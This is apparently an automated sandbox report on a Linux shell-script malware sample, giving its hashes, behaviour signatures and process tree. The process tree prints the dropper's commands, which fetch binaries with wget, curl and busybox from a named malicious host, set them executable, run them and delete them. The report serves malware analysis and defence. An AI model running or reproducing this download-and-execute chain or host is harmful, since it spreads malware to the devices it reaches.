Analysis

  • max time kernel
    148s
  • max time network
    6s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21/10/2024, 01:29

General

  • Target

    88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh

  • Size

    10KB

  • MD5

    4df258afac082c765345136687fdb240

  • SHA1

    0cdbf5333864ea193e81b258a488b509df0bed0a

  • SHA256

    88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc

  • SHA512

    ad97012e97547376dc1525f12c378e6cf8a864ec108266cc9a8875ae99b65a8a68eca912a1175e43584f1298bee6471c7c67d8f8af9416a5847fdaf39894ad5e

  • SSDEEP

    192:FhU03aGPwo229c4kQMNyqJOpsxl47T/U03aGzm229csyxl47TfQMNyqI:FaOkQMNyqJOpsxl47Toyxl47TfQMNyqI

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
    /tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
    1⤵
      PID:649
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:652
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
          • System Network Configuration Discovery
          PID:660
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:666
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
          • System Network Configuration Discovery
          PID:680
        • /bin/chmod
          chmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
          • File and Directory Permissions Modification
          PID:683
        • /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          ./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
          • Executes dropped EXE
          PID:684
        • /bin/rm
          rm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
          2⤵
            PID:685
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK
            2⤵
            • System Network Configuration Discovery
            PID:687
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:688

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM

                Filesize

                153B

                MD5

                998368d7c95ea4293237f2320546e440

                SHA1

                30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                SHA256

                533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                SHA512

                648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97